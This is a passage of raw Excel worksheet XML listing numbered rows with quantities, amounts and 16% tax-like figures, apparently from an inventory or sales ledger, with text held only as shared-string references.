      <c r="K2367" s="16"/>
    </row>
    <row r="2368" spans="2:11">
      <c r="B2368" s="9">
        <v>2402</v>
      </c>
      <c r="C2368" s="238" t="s">
        <v>11271</v>
      </c>
      <c r="D2368" s="238" t="s">
        <v>11272</v>
      </c>
      <c r="E2368" s="238" t="s">
        <v>11273</v>
      </c>
      <c r="F2368" s="238" t="s">
        <v>11274</v>
      </c>
      <c r="G2368" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2368" s="10">
        <v>70</v>
      </c>
      <c r="I2368" s="14">
        <v>927.28</v>
      </c>
      <c r="J2368" s="15">
        <v>148.4</v>
      </c>
      <c r="K2368" s="16"/>
    </row>
    <row r="2369" spans="2:11">
      <c r="B2369" s="9">
        <v>2403</v>
      </c>
      <c r="C2369" s="238" t="s">
        <v>11275</v>
      </c>
      <c r="D2369" s="238" t="s">
        <v>11276</v>
      </c>
      <c r="E2369" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F2369" s="238" t="s">
        <v>11277</v>
      </c>
      <c r="G2369" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2369" s="10">
        <v>62</v>
      </c>
      <c r="I2369" s="14">
        <v>1204.67</v>
      </c>
      <c r="J2369" s="15">
        <v>192.7456</v>
      </c>
      <c r="K2369" s="16"/>
    </row>
    <row r="2370" spans="2:11">
      <c r="B2370" s="9">
        <v>2404</v>
      </c>
      <c r="C2370" s="238" t="s">
        <v>11278</v>
      </c>
      <c r="D2370" s="238" t="s">
        <v>11279</v>
      </c>
      <c r="E2370" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2370" s="238" t="s">
        <v>11280</v>
      </c>
      <c r="G2370" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2370" s="10">
        <v>21</v>
      </c>
      <c r="I2370" s="14">
        <v>2411.1</v>
      </c>
      <c r="J2370" s="15">
        <v>385.7616</v>
      </c>
      <c r="K2370" s="16"/>
    </row>
    <row r="2371" spans="2:11">
      <c r="B2371" s="9">
        <v>2405</v>
      </c>
      <c r="C2371" s="238" t="s">
        <v>11281</v>
      </c>
      <c r="D2371" s="238" t="s">
        <v>11282</v>
      </c>
      <c r="E2371" s="238" t="s">
        <v>11283</v>
      </c>
      <c r="F2371" s="238" t="s">
        <v>11284</v>
      </c>
      <c r="G2371" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2371" s="10">
        <v>3</v>
      </c>
      <c r="I2371" s="14">
        <v>3538.46</v>
      </c>
      <c r="J2371" s="15">
        <v>566.1552</v>
      </c>
      <c r="K2371" s="16"/>
    </row>
    <row r="2372" spans="2:11">
      <c r="B2372" s="9">
        <v>2406</v>
      </c>
      <c r="C2372" s="238" t="s">
        <v>11285</v>
      </c>
      <c r="D2372" s="238" t="s">
        <v>11286</v>
      </c>
      <c r="E2372" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2372" s="238" t="s">
        <v>11287</v>
      </c>
      <c r="G2372" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2372" s="10">
        <v>2</v>
      </c>
      <c r="I2372" s="14">
        <v>786.32</v>
      </c>
      <c r="J2372" s="15">
        <v>125.8112</v>
      </c>
      <c r="K2372" s="16"/>
    </row>
    <row r="2373" spans="2:11">
      <c r="B2373" s="9">
        <v>2407</v>
      </c>
      <c r="C2373" s="238" t="s">
        <v>11288</v>
      </c>
      <c r="D2373" s="238" t="s">
        <v>11289</v>
      </c>
      <c r="E2373" s="238" t="s">
        <v>11290</v>
      </c>
      <c r="F2373" s="238" t="s">
        <v>11291</v>
      </c>
      <c r="G2373" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2373" s="10">
        <v>6</v>
      </c>
      <c r="I2373" s="14">
        <v>7179.49</v>
      </c>
      <c r="J2373" s="15">
        <v>1148.7168</v>
      </c>
      <c r="K2373" s="16"/>
    </row>
    <row r="2374" spans="2:11">
      <c r="B2374" s="9">
        <v>2408</v>
      </c>
      <c r="C2374" s="238" t="s">
        <v>11292</v>
      </c>
      <c r="D2374" s="238" t="s">
        <v>11293</v>
      </c>
      <c r="E2374" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F2374" s="238" t="s">
        <v>11294</v>
      </c>
      <c r="G2374" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2374" s="10">
        <v>70</v>
      </c>
      <c r="I2374" s="14">
        <v>1585.44</v>
      </c>
      <c r="J2374" s="15">
        <v>253.68</v>
      </c>
      <c r="K2374" s="16"/>
    </row>
    <row r="2375" spans="2:11">
      <c r="B2375" s="9">
        <v>2409</v>
      </c>
      <c r="C2375" s="238" t="s">
        <v>11295</v>
      </c>
      <c r="D2375" s="238" t="s">
        <v>11296</v>
      </c>
      <c r="E2375" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2375" s="238" t="s">
        <v>11297</v>
      </c>
      <c r="G2375" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2375" s="10">
        <v>4</v>
      </c>
      <c r="I2375" s="14">
        <v>2450</v>
      </c>
      <c r="J2375" s="15">
        <v>392</v>
      </c>
      <c r="K2375" s="16"/>
    </row>
    <row r="2376" spans="2:11">
      <c r="B2376" s="9">
        <v>2410</v>
      </c>
      <c r="C2376" s="238" t="s">
        <v>11298</v>
      </c>
      <c r="D2376" s="238" t="s">
        <v>11299</v>
      </c>
      <c r="E2376" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2376" s="238" t="s">
        <v>11300</v>
      </c>
      <c r="G2376" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2376" s="10">
        <v>7</v>
      </c>
      <c r="I2376" s="14">
        <v>1077.37</v>
      </c>
      <c r="J2376" s="15">
        <v>172.3792</v>
      </c>
      <c r="K2376" s="16"/>
    </row>
    <row r="2377" spans="2:11">
      <c r="B2377" s="9">
        <v>2411</v>
      </c>
      <c r="C2377" s="238" t="s">
        <v>11301</v>
      </c>
      <c r="D2377" s="238" t="s">
        <v>11302</v>
      </c>
      <c r="E2377" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2377" s="238" t="s">
        <v>11303</v>
      </c>
      <c r="G2377" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2377" s="10">
        <v>20</v>
      </c>
      <c r="I2377" s="14">
        <v>351.5</v>
      </c>
      <c r="J2377" s="15">
        <v>56.256</v>
      </c>
      <c r="K2377" s="16"/>
    </row>
    <row r="2378" spans="2:11">
      <c r="B2378" s="9">
        <v>2412</v>
      </c>
      <c r="C2378" s="238" t="s">
        <v>11304</v>
      </c>
      <c r="D2378" s="238" t="s">
        <v>11305</v>
      </c>
      <c r="E2378" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2378" s="238" t="s">
        <v>11306</v>
      </c>
      <c r="G2378" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2378" s="10">
        <v>50</v>
      </c>
      <c r="I2378" s="14">
        <v>1465.28</v>
      </c>
      <c r="J2378" s="15">
        <v>234.48</v>
      </c>
      <c r="K2378" s="16"/>
    </row>
    <row r="2379" spans="2:11">
      <c r="B2379" s="9">
        <v>2413</v>
      </c>
      <c r="C2379" s="238" t="s">
        <v>11307</v>
      </c>
      <c r="D2379" s="238" t="s">
        <v>11308</v>
      </c>
      <c r="E2379" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2379" s="238" t="s">
        <v>11309</v>
      </c>
      <c r="G2379" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2379" s="10">
        <v>4</v>
      </c>
      <c r="I2379" s="14">
        <v>179.91</v>
      </c>
      <c r="J2379" s="15">
        <v>28.7872</v>
      </c>
      <c r="K2379" s="16"/>
    </row>
    <row r="2380" spans="2:11">
      <c r="B2380" s="9">
        <v>2414</v>
      </c>
      <c r="C2380" s="238" t="s">
        <v>11310</v>
      </c>
      <c r="D2380" s="238" t="s">
        <v>11311</v>
      </c>
      <c r="E2380" s="238" t="s">
        <v>11312</v>
      </c>
      <c r="F2380" s="238" t="s">
        <v>11313</v>
      </c>
      <c r="G2380" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2380" s="10">
        <v>1</v>
      </c>
      <c r="I2380" s="14">
        <v>18803.42</v>
      </c>
      <c r="J2380" s="15">
        <v>3008.5472</v>
      </c>
      <c r="K2380" s="16"/>
    </row>
    <row r="2381" spans="2:11">
      <c r="B2381" s="9">
        <v>2415</v>
      </c>
      <c r="C2381" s="238" t="s">
        <v>11314</v>
      </c>
      <c r="D2381" s="238" t="s">
        <v>11315</v>
      </c>
      <c r="E2381" s="238" t="s">
        <v>11316</v>
      </c>
      <c r="F2381" s="238" t="s">
        <v>11317</v>
      </c>
      <c r="G2381" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2381" s="10">
        <v>1</v>
      </c>
      <c r="I2381" s="14">
        <v>4222.22</v>
      </c>
      <c r="J2381" s="15">
        <v>675.5552</v>
      </c>
      <c r="K2381" s="16"/>
    </row>
    <row r="2382" spans="2:11">
      <c r="B2382" s="9">
        <v>2416</v>
      </c>
      <c r="C2382" s="238" t="s">
        <v>11318</v>
      </c>
      <c r="D2382" s="238" t="s">
        <v>11319</v>
      </c>
      <c r="E2382" s="238" t="s">
        <v>8114</v>
      </c>
      <c r="F2382" s="238" t="s">
        <v>11320</v>
      </c>
      <c r="G2382" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2382" s="10">
        <v>1</v>
      </c>
      <c r="I2382" s="14">
        <v>1794.87</v>
      </c>
      <c r="J2382" s="15">
        <v>287.1792</v>
      </c>
      <c r="K2382" s="16"/>
    </row>
    <row r="2383" spans="2:11">
      <c r="B2383" s="9">
        <v>2417</v>
      </c>
      <c r="C2383" s="238" t="s">
        <v>11321</v>
      </c>
      <c r="D2383" s="238" t="s">
        <v>11322</v>
      </c>
      <c r="E2383" s="238" t="s">
        <v>11323</v>
      </c>
      <c r="F2383" s="238" t="s">
        <v>11324</v>
      </c>
      <c r="G2383" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2383" s="10">
        <v>1</v>
      </c>
      <c r="I2383" s="14">
        <v>1709.4</v>
      </c>
      <c r="J2383" s="15">
        <v>273.504</v>
      </c>
      <c r="K2383" s="16"/>
    </row>
    <row r="2384" spans="2:11">
      <c r="B2384" s="9">
        <v>2418</v>
      </c>
      <c r="C2384" s="238" t="s">
        <v>11325</v>
      </c>
      <c r="D2384" s="238" t="s">
        <v>11326</v>
      </c>
      <c r="E2384" s="238" t="s">
        <v>3907</v>
      </c>
      <c r="F2384" s="238" t="s">
        <v>11327</v>
      </c>
      <c r="G2384" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2384" s="10">
        <v>1</v>
      </c>
      <c r="I2384" s="14">
        <v>3500</v>
      </c>
      <c r="J2384" s="15">
        <v>560</v>
      </c>
      <c r="K2384" s="16"/>
    </row>
    <row r="2385" spans="2:11">
      <c r="B2385" s="9">
        <v>2419</v>
      </c>
      <c r="C2385" s="238" t="s">
        <v>11328</v>
      </c>
      <c r="D2385" s="238" t="s">
        <v>11329</v>
      </c>
      <c r="E2385" s="238" t="s">
        <v>7829</v>
      </c>
      <c r="F2385" s="238" t="s">
        <v>11330</v>
      </c>
      <c r="G2385" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2385" s="10">
        <v>1</v>
      </c>
      <c r="I2385" s="14">
        <v>3260.23</v>
      </c>
      <c r="J2385" s="15">
        <v>521.6368</v>
      </c>
      <c r="K2385" s="16"/>
    </row>
    <row r="2386" spans="2:11">
      <c r="B2386" s="9">
        <v>2420</v>
      </c>
      <c r="C2386" s="238" t="s">
        <v>11331</v>
      </c>
      <c r="D2386" s="238" t="s">
        <v>11332</v>
      </c>
      <c r="E2386" s="238" t="s">
        <v>7896</v>
      </c>
      <c r="F2386" s="238" t="s">
        <v>11333</v>
      </c>
      <c r="G2386" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2386" s="10">
        <v>1</v>
      </c>
      <c r="I2386" s="14">
        <v>3333.33</v>
      </c>
      <c r="J2386" s="15">
        <v>533.3328</v>
      </c>
      <c r="K2386" s="16"/>
    </row>
    <row r="2387" spans="2:11">
      <c r="B2387" s="9">
        <v>2421</v>
      </c>
      <c r="C2387" s="238" t="s">
        <v>11334</v>
      </c>
      <c r="D2387" s="238" t="s">
        <v>11335</v>
      </c>
      <c r="E2387" s="238" t="s">
        <v>4831</v>
      </c>
      <c r="F2387" s="9"/>
      <c r="G2387" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2387" s="10">
        <v>2</v>
      </c>
      <c r="I2387" s="14">
        <v>868.38</v>
      </c>
      <c r="J2387" s="15">
        <v>138.9408</v>
      </c>
      <c r="K2387" s="16"/>
    </row>
    <row r="2388" spans="2:11">
      <c r="B2388" s="9">
        <v>2422</v>
      </c>
      <c r="C2388" s="238" t="s">
        <v>11336</v>
      </c>
      <c r="D2388" s="238" t="s">
        <v>8429</v>
      </c>
      <c r="E2388" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2388" s="238" t="s">
        <v>11338</v>
      </c>
      <c r="G2388" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2388" s="10">
        <v>2</v>
      </c>
      <c r="I2388" s="14">
        <v>393.17</v>
      </c>
      <c r="J2388" s="15">
        <v>62.9088</v>
      </c>
      <c r="K2388" s="16"/>
    </row>
    <row r="2389" spans="2:11">
      <c r="B2389" s="9">
        <v>2423</v>
      </c>
      <c r="C2389" s="238" t="s">
        <v>11339</v>
      </c>
      <c r="D2389" s="238" t="s">
        <v>8429</v>
      </c>
      <c r="E2389" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2389" s="238" t="s">
        <v>11340</v>
      </c>
      <c r="G2389" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2389" s="10">
        <v>10</v>
      </c>
      <c r="I2389" s="14">
        <v>1538.46</v>
      </c>
      <c r="J2389" s="15">
        <v>246.16</v>
      </c>
      <c r="K2389" s="16"/>
    </row>
    <row r="2390" spans="2:11">
      <c r="B2390" s="9">
        <v>2424</v>
      </c>
      <c r="C2390" s="238" t="s">
        <v>11341</v>
      </c>
      <c r="D2390" s="238" t="s">
        <v>11342</v>
      </c>
      <c r="E2390" s="238" t="s">
        <v>11343</v>
      </c>
      <c r="F2390" s="238" t="s">
        <v>11344</v>
      </c>
      <c r="G2390" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2390" s="10">
        <v>3</v>
      </c>
      <c r="I2390" s="14">
        <v>2293.46</v>
      </c>
      <c r="J2390" s="15">
        <v>366.9552</v>
      </c>
      <c r="K2390" s="16"/>
    </row>
    <row r="2391" spans="2:11">
      <c r="B2391" s="9">
        <v>2425</v>
      </c>
      <c r="C2391" s="238" t="s">
        <v>11345</v>
      </c>
      <c r="D2391" s="238" t="s">
        <v>8429</v>
      </c>
      <c r="E2391" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2391" s="238" t="s">
        <v>11346</v>
      </c>
      <c r="G2391" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2391" s="10">
        <v>5</v>
      </c>
      <c r="I2391" s="14">
        <v>1013.42</v>
      </c>
      <c r="J2391" s="15">
        <v>162.144</v>
      </c>
      <c r="K2391" s="16"/>
    </row>
    <row r="2392" spans="2:11">
      <c r="B2392" s="9">
        <v>2426</v>
      </c>
      <c r="C2392" s="238" t="s">
        <v>11347</v>
      </c>
      <c r="D2392" s="238" t="s">
        <v>11348</v>
      </c>
      <c r="E2392" s="238" t="s">
        <v>8300</v>
      </c>
      <c r="F2392" s="238" t="s">
        <v>11349</v>
      </c>
      <c r="G2392" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2392" s="10">
        <v>4</v>
      </c>
      <c r="I2392" s="14">
        <v>752.14</v>
      </c>
      <c r="J2392" s="15">
        <v>120.3456</v>
      </c>
      <c r="K2392" s="16"/>
    </row>
    <row r="2393" spans="2:11">
      <c r="B2393" s="9">
        <v>2427</v>
      </c>
      <c r="C2393" s="238" t="s">
        <v>11350</v>
      </c>
      <c r="D2393" s="238" t="s">
        <v>11351</v>
      </c>
      <c r="E2393" s="238" t="s">
        <v>7771</v>
      </c>
      <c r="F2393" s="238" t="s">
        <v>11352</v>
      </c>
      <c r="G2393" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2393" s="10">
        <v>4</v>
      </c>
      <c r="I2393" s="14">
        <v>307.69</v>
      </c>
      <c r="J2393" s="15">
        <v>49.2288</v>
      </c>
      <c r="K2393" s="16"/>
    </row>
    <row r="2394" spans="2:11">
      <c r="B2394" s="9">
        <v>2428</v>
      </c>
      <c r="C2394" s="238" t="s">
        <v>11353</v>
      </c>
      <c r="D2394" s="238" t="s">
        <v>11354</v>
      </c>
      <c r="E2394" s="238" t="s">
        <v>11355</v>
      </c>
      <c r="F2394" s="238" t="s">
        <v>11356</v>
      </c>
      <c r="G2394" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2394" s="10">
        <v>88</v>
      </c>
      <c r="I2394" s="14">
        <v>4509.78</v>
      </c>
      <c r="J2394" s="15">
        <v>721.6</v>
      </c>
      <c r="K2394" s="16"/>
    </row>
    <row r="2395" spans="2:11">
      <c r="B2395" s="9">
        <v>2429</v>
      </c>
      <c r="C2395" s="238" t="s">
        <v>11357</v>
      </c>
      <c r="D2395" s="238" t="s">
        <v>11358</v>
      </c>
      <c r="E2395" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F2395" s="238" t="s">
        <v>11359</v>
      </c>
      <c r="G2395" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2395" s="10">
        <v>2</v>
      </c>
      <c r="I2395" s="14">
        <v>2721.6</v>
      </c>
      <c r="J2395" s="15">
        <v>435.456</v>
      </c>
      <c r="K2395" s="16"/>
    </row>
    <row r="2396" spans="2:11">
      <c r="B2396" s="9">
        <v>2430</v>
      </c>
      <c r="C2396" s="238" t="s">
        <v>11360</v>
      </c>
      <c r="D2396" s="238" t="s">
        <v>11361</v>
      </c>
      <c r="E2396" s="238" t="s">
        <v>11362</v>
      </c>
      <c r="F2396" s="238" t="s">
        <v>11363</v>
      </c>
      <c r="G2396" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2396" s="10">
        <v>13</v>
      </c>
      <c r="I2396" s="14">
        <v>248.43</v>
      </c>
      <c r="J2396" s="15">
        <v>39.7488</v>
      </c>
      <c r="K2396" s="16"/>
    </row>
    <row r="2397" spans="2:11">
      <c r="B2397" s="9">
        <v>2431</v>
      </c>
      <c r="C2397" s="238" t="s">
        <v>11364</v>
      </c>
      <c r="D2397" s="238" t="s">
        <v>11365</v>
      </c>
      <c r="E2397" s="238" t="s">
        <v>11366</v>
      </c>
      <c r="F2397" s="238" t="s">
        <v>11367</v>
      </c>
      <c r="G2397" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2397" s="10">
        <v>5</v>
      </c>
      <c r="I2397" s="14">
        <v>335</v>
      </c>
      <c r="J2397" s="15">
        <v>53.6</v>
      </c>
      <c r="K2397" s="16"/>
    </row>
    <row r="2398" spans="2:11">
      <c r="B2398" s="9">
        <v>2432</v>
      </c>
      <c r="C2398" s="238" t="s">
        <v>11368</v>
      </c>
      <c r="D2398" s="238" t="s">
        <v>11369</v>
      </c>
      <c r="E2398" s="238" t="s">
        <v>11370</v>
      </c>
      <c r="F2398" s="238" t="s">
        <v>11371</v>
      </c>
      <c r="G2398" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2398" s="10">
        <v>1</v>
      </c>
      <c r="I2398" s="14">
        <v>56.41</v>
      </c>
      <c r="J2398" s="15">
        <v>9.0256</v>
      </c>
      <c r="K2398" s="16"/>
    </row>
    <row r="2399" spans="2:11">
      <c r="B2399" s="9">
        <v>2433</v>
      </c>
      <c r="C2399" s="238" t="s">
        <v>11372</v>
      </c>
      <c r="D2399" s="238" t="s">
        <v>11373</v>
      </c>
      <c r="E2399" s="238" t="s">
        <v>11374</v>
      </c>
      <c r="F2399" s="238" t="s">
        <v>11375</v>
      </c>
      <c r="G2399" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2399" s="10">
        <v>3</v>
      </c>
      <c r="I2399" s="14">
        <v>191.2</v>
      </c>
      <c r="J2399" s="15">
        <v>30.5904</v>
      </c>
      <c r="K2399" s="16"/>
    </row>
    <row r="2400" spans="2:11">
      <c r="B2400" s="9">
        <v>2434</v>
      </c>
      <c r="C2400" s="238" t="s">
        <v>11376</v>
      </c>
      <c r="D2400" s="238" t="s">
        <v>11377</v>
      </c>
      <c r="E2400" s="238" t="s">
        <v>11378</v>
      </c>
      <c r="F2400" s="238" t="s">
        <v>11379</v>
      </c>
      <c r="G2400" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2400" s="10">
        <v>4</v>
      </c>
      <c r="I2400" s="14">
        <v>820.52</v>
      </c>
      <c r="J2400" s="15">
        <v>131.2832</v>
      </c>
      <c r="K2400" s="16"/>
    </row>
    <row r="2401" spans="2:11">
      <c r="B2401" s="9">
        <v>2435</v>
      </c>
      <c r="C2401" s="238" t="s">
        <v>11380</v>
      </c>
      <c r="D2401" s="238" t="s">
        <v>11381</v>
      </c>
      <c r="E2401" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F2401" s="238" t="s">
        <v>11382</v>
      </c>
      <c r="G2401" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2401" s="10">
        <v>51</v>
      </c>
      <c r="I2401" s="14">
        <v>1046.32</v>
      </c>
      <c r="J2401" s="15">
        <v>167.4432</v>
      </c>
      <c r="K2401" s="16"/>
    </row>
    <row r="2402" spans="2:11">
      <c r="B2402" s="9">
        <v>2436</v>
      </c>
      <c r="C2402" s="238" t="s">
        <v>11383</v>
      </c>
      <c r="D2402" s="238" t="s">
        <v>11384</v>
      </c>
      <c r="E2402" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2402" s="238" t="s">
        <v>11385</v>
      </c>
      <c r="G2402" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2402" s="10">
        <v>12</v>
      </c>
      <c r="I2402" s="14">
        <v>122</v>
      </c>
      <c r="J2402" s="15">
        <v>19.5264</v>
      </c>
      <c r="K2402" s="16"/>
    </row>
    <row r="2403" spans="2:11">
      <c r="B2403" s="9">
        <v>2437</v>
      </c>
      <c r="C2403" s="238" t="s">
        <v>11386</v>
      </c>
      <c r="D2403" s="238" t="s">
        <v>11387</v>
      </c>
      <c r="E2403" s="238" t="s">
        <v>11388</v>
      </c>
      <c r="F2403" s="238" t="s">
        <v>11389</v>
      </c>
      <c r="G2403" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2403" s="10">
        <v>1</v>
      </c>
      <c r="I2403" s="14">
        <v>33.59</v>
      </c>
      <c r="J2403" s="15">
        <v>5.3744</v>
      </c>
      <c r="K2403" s="16"/>
    </row>
    <row r="2404" spans="2:11">
      <c r="B2404" s="9">
        <v>2438</v>
      </c>
      <c r="C2404" s="238" t="s">
        <v>11390</v>
      </c>
      <c r="D2404" s="238" t="s">
        <v>11391</v>
      </c>
      <c r="E2404" s="238" t="s">
        <v>11392</v>
      </c>
      <c r="F2404" s="238" t="s">
        <v>11393</v>
      </c>
      <c r="G2404" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2404" s="10">
        <v>76</v>
      </c>
      <c r="I2404" s="14">
        <v>458.96</v>
      </c>
      <c r="J2404" s="15">
        <v>73.4464</v>
      </c>
      <c r="K2404" s="16"/>
    </row>
    <row r="2405" spans="2:11">
      <c r="B2405" s="9">
        <v>2439</v>
      </c>
      <c r="C2405" s="238" t="s">
        <v>11394</v>
      </c>
      <c r="D2405" s="238" t="s">
        <v>11395</v>
      </c>
      <c r="E2405" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F2405" s="238" t="s">
        <v>11396</v>
      </c>
      <c r="G2405" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2405" s="10">
        <v>10</v>
      </c>
      <c r="I2405" s="14">
        <v>6256.41</v>
      </c>
      <c r="J2405" s="15">
        <v>1001.024</v>
      </c>
      <c r="K2405" s="16"/>
    </row>
    <row r="2406" spans="2:11">
      <c r="B2406" s="9">
        <v>2440</v>
      </c>
      <c r="C2406" s="238" t="s">
        <v>11397</v>
      </c>
      <c r="D2406" s="238" t="s">
        <v>11398</v>
      </c>
      <c r="E2406" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2406" s="238" t="s">
        <v>11399</v>
      </c>
      <c r="G2406" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2406" s="10">
        <v>244</v>
      </c>
      <c r="I2406" s="14">
        <v>543.46</v>
      </c>
      <c r="J2406" s="15">
        <v>87.0592</v>
      </c>
      <c r="K2406" s="16"/>
    </row>
    <row r="2407" spans="2:11">
      <c r="B2407" s="9">
        <v>2441</v>
      </c>
      <c r="C2407" s="238" t="s">
        <v>11400</v>
      </c>
      <c r="D2407" s="238" t="s">
        <v>11401</v>
      </c>
      <c r="E2407" s="238" t="s">
        <v>11402</v>
      </c>
      <c r="F2407" s="238" t="s">
        <v>11403</v>
      </c>
      <c r="G2407" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2407" s="10">
        <v>14</v>
      </c>
      <c r="I2407" s="14">
        <v>53123.01</v>
      </c>
      <c r="J2407" s="15">
        <v>8499.68</v>
      </c>
      <c r="K2407" s="16"/>
    </row>
    <row r="2408" spans="2:11">
      <c r="B2408" s="9">
        <v>2442</v>
      </c>
      <c r="C2408" s="238" t="s">
        <v>11404</v>
      </c>
      <c r="D2408" s="9"/>
      <c r="E2408" s="238" t="s">
        <v>11405</v>
      </c>
      <c r="F2408" s="9"/>
      <c r="G2408" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2408" s="10">
        <v>6</v>
      </c>
      <c r="I2408" s="14">
        <v>1982.9</v>
      </c>
      <c r="J2408" s="15">
        <v>317.2608</v>
      </c>
      <c r="K2408" s="16"/>
    </row>
    <row r="2409" spans="2:11">
      <c r="B2409" s="9">
        <v>2443</v>
      </c>
      <c r="C2409" s="238" t="s">
        <v>11406</v>
      </c>
      <c r="D2409" s="238" t="s">
        <v>11407</v>
      </c>
      <c r="E2409" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2409" s="238" t="s">
        <v>11408</v>
      </c>
      <c r="G2409" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2409" s="10">
        <v>62</v>
      </c>
      <c r="I2409" s="14">
        <v>7493.15</v>
      </c>
      <c r="J2409" s="15">
        <v>1198.9312</v>
      </c>
      <c r="K2409" s="16"/>
    </row>
    <row r="2410" spans="2:11">
      <c r="B2410" s="9">
        <v>2444</v>
      </c>
      <c r="C2410" s="238" t="s">
        <v>11409</v>
      </c>
      <c r="D2410" s="238" t="s">
        <v>11410</v>
      </c>
      <c r="E2410" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2410" s="238" t="s">
        <v>11411</v>
      </c>
      <c r="G2410" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2410" s="10">
        <v>63</v>
      </c>
      <c r="I2410" s="14">
        <v>8129.71</v>
      </c>
      <c r="J2410" s="15">
        <v>1300.7232</v>
      </c>
      <c r="K2410" s="16"/>
    </row>
    <row r="2411" spans="2:11">
      <c r="B2411" s="9">
        <v>2445</v>
      </c>
      <c r="C2411" s="238" t="s">
        <v>11412</v>
      </c>
      <c r="D2411" s="238" t="s">
        <v>11413</v>
      </c>
      <c r="E2411" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F2411" s="238" t="s">
        <v>11414</v>
      </c>
      <c r="G2411" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2411" s="10">
        <v>22</v>
      </c>
      <c r="I2411" s="14">
        <v>2582.64</v>
      </c>
      <c r="J2411" s="15">
        <v>413.2128</v>
      </c>
      <c r="K2411" s="16"/>
    </row>
    <row r="2412" spans="2:11">
      <c r="B2412" s="9">
        <v>2446</v>
      </c>
      <c r="C2412" s="238" t="s">
        <v>11415</v>
      </c>
      <c r="D2412" s="238" t="s">
        <v>11416</v>
      </c>
      <c r="E2412" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2412" s="238" t="s">
        <v>11417</v>
      </c>
      <c r="G2412" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2412" s="10">
        <v>4</v>
      </c>
      <c r="I2412" s="14">
        <v>1052</v>
      </c>
      <c r="J2412" s="15">
        <v>168.32</v>
      </c>
      <c r="K2412" s="16"/>
    </row>
    <row r="2413" spans="2:11">
      <c r="B2413" s="9">
        <v>2447</v>
      </c>
      <c r="C2413" s="238" t="s">
        <v>11418</v>
      </c>
      <c r="D2413" s="238" t="s">
        <v>11419</v>
      </c>
      <c r="E2413" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2413" s="238" t="s">
        <v>11420</v>
      </c>
      <c r="G2413" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2413" s="10">
        <v>13</v>
      </c>
      <c r="I2413" s="14">
        <v>3549.69</v>
      </c>
      <c r="J2413" s="15">
        <v>567.944</v>
      </c>
      <c r="K2413" s="16"/>
    </row>
    <row r="2414" spans="2:11">
      <c r="B2414" s="9">
        <v>2448</v>
      </c>
      <c r="C2414" s="238" t="s">
        <v>11421</v>
      </c>
      <c r="D2414" s="238" t="s">
        <v>11422</v>
      </c>
      <c r="E2414" s="238" t="s">
        <v>11094</v>
      </c>
      <c r="F2414" s="238" t="s">
        <v>11423</v>
      </c>
      <c r="G2414" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2414" s="10">
        <v>1</v>
      </c>
      <c r="I2414" s="14">
        <v>422.22</v>
      </c>
      <c r="J2414" s="15">
        <v>67.5552</v>
      </c>
      <c r="K2414" s="16"/>
    </row>
    <row r="2415" spans="2:11">
